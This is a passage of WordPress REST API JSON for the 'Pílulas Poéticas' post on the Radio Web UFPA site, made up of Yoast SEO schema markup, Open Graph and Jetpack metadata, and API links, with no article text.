Po\u00e9ticas\",\"datePublished\":\"2021-05-25T14:25:15+00:00\",\"dateModified\":\"2025-10-21T14:33:06+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/\"},\"wordCount\":168,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/belem_destacado.png?fit=1080%2C1080&ssl=1\",\"articleSection\":[\"Interprogramas\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/\",\"url\":\"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/\",\"name\":\"P\u00edlulas Po\u00e9ticas - Radio Web UFPA\",\"isPartOf\":{\"@id\":\"https:\/\/radio.ufpa.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/belem_destacado.png?fit=1080%2C1080&ssl=1\",\"datePublished\":\"2021-05-25T14:25:15+00:00\",\"dateModified\":\"2025-10-21T14:33:06+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/#primaryimage\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/belem_destacado.png?fit=1080%2C1080&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/belem_destacado.png?fit=1080%2C1080&ssl=1\",\"width\":1080,\"height\":1080},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/radio.ufpa.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"P\u00edlulas Po\u00e9ticas\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/radio.ufpa.br\/#website\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"name\":\"Radio Web UFPA\",\"description\":\"Divulgando o conhecimento\",\"publisher\":{\"@id\":\"https:\/\/radio.ufpa.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/radio.ufpa.br\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/radio.ufpa.br\/#organization\",\"name\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\",\"url\":\"https:\/\/radio.ufpa.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"contentUrl\":\"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1\",\"width\":417,\"height\":121,\"caption\":\"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA\"},\"image\":{\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/radiowebufpa\",\"https:\/\/x.com\/radiowebufpa\",\"https:\/\/www.instagram.com\/radiowebufpa\/\",\"https:\/\/www.youtube.com\/user\/RadioWebUFP4\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/fca55d052dba7f58491528e32dd066e4\",\"name\":\"Isaac Gomes\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/9cf323401b814caad552b2504acfd0da?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/9cf323401b814caad552b2504acfd0da?s=96&d=mm&r=g\",\"caption\":\"Isaac Gomes\"},\"url\":\"https:\/\/radio.ufpa.br\/index.php\/author\/isaac\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"P\u00edlulas Po\u00e9ticas - Radio Web UFPA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/","og_locale":"pt_BR","og_type":"article","og_title":"P\u00edlulas Po\u00e9ticas - Radio Web UFPA","og_description":"... Ler mais","og_url":"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/","og_site_name":"Radio Web UFPA","article_publisher":"https:\/\/www.facebook.com\/radiowebufpa","article_published_time":"2021-05-25T14:25:15+00:00","article_modified_time":"2025-10-21T14:33:06+00:00","og_image":[{"width":1080,"height":1080,"url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/belem_destacado.png?fit=1080%2C1080&ssl=1","type":"image\/png"}],"author":"Isaac Gomes","twitter_card":"summary_large_image","twitter_creator":"@radiowebufpa","twitter_site":"@radiowebufpa","twitter_misc":{"Escrito por":"Isaac Gomes","Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/#article","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/"},"author":{"name":"Isaac Gomes","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/fca55d052dba7f58491528e32dd066e4"},"headline":"P\u00edlulas Po\u00e9ticas","datePublished":"2021-05-25T14:25:15+00:00","dateModified":"2025-10-21T14:33:06+00:00","mainEntityOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/"},"wordCount":168,"commentCount":0,"publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/belem_destacado.png?fit=1080%2C1080&ssl=1","articleSection":["Interprogramas"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/","url":"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/","name":"P\u00edlulas Po\u00e9ticas - Radio Web UFPA","isPartOf":{"@id":"https:\/\/radio.ufpa.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/#primaryimage"},"image":{"@id":"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/#primaryimage"},"thumbnailUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/belem_destacado.png?fit=1080%2C1080&ssl=1","datePublished":"2021-05-25T14:25:15+00:00","dateModified":"2025-10-21T14:33:06+00:00","breadcrumb":{"@id":"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/#primaryimage","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/belem_destacado.png?fit=1080%2C1080&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/belem_destacado.png?fit=1080%2C1080&ssl=1","width":1080,"height":1080},{"@type":"BreadcrumbList","@id":"https:\/\/radio.ufpa.br\/index.php\/interprogramas\/pilulas-poeticas\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/radio.ufpa.br\/"},{"@type":"ListItem","position":2,"name":"P\u00edlulas Po\u00e9ticas"}]},{"@type":"WebSite","@id":"https:\/\/radio.ufpa.br\/#website","url":"https:\/\/radio.ufpa.br\/","name":"Radio Web UFPA","description":"Divulgando o conhecimento","publisher":{"@id":"https:\/\/radio.ufpa.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/radio.ufpa.br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/radio.ufpa.br\/#organization","name":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA","url":"https:\/\/radio.ufpa.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","contentUrl":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2025\/12\/images-removebg-preview.png?fit=417%2C121&ssl=1","width":417,"height":121,"caption":"UNIVERSIDADE FEDERAL DO PAR\u00c1-R\u00c1DIO WEB UFPA"},"image":{"@id":"https:\/\/radio.ufpa.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/radiowebufpa","https:\/\/x.com\/radiowebufpa","https:\/\/www.instagram.com\/radiowebufpa\/","https:\/\/www.youtube.com\/user\/RadioWebUFP4"]},{"@type":"Person","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/fca55d052dba7f58491528e32dd066e4","name":"Isaac Gomes","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/radio.ufpa.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/9cf323401b814caad552b2504acfd0da?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/9cf323401b814caad552b2504acfd0da?s=96&d=mm&r=g","caption":"Isaac Gomes"},"url":"https:\/\/radio.ufpa.br\/index.php\/author\/isaac\/"}]}},"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/radio.ufpa.br\/wp-content\/uploads\/2021\/05\/belem_destacado.png?fit=1080%2C1080&ssl=1","jetpack_shortlink":"https:\/\/wp.me\/p8TJeA-2ax","jetpack_likes_enabled":true,"jetpack-related-posts":[],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/8341","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/users\/16"}],"replies":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/comments?post=8341"}],"version-history":[{"count":16,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/8341\/revisions"}],"predecessor-version":[{"id":17570,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/posts\/8341\/revisions\/17570"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media\/9363"}],"wp:attachment":[{"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/media?parent=8341"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/categories?post=8341"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radio.ufpa.br\/index.php\/wp-json\/wp\/v2\/tags?post=8341"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}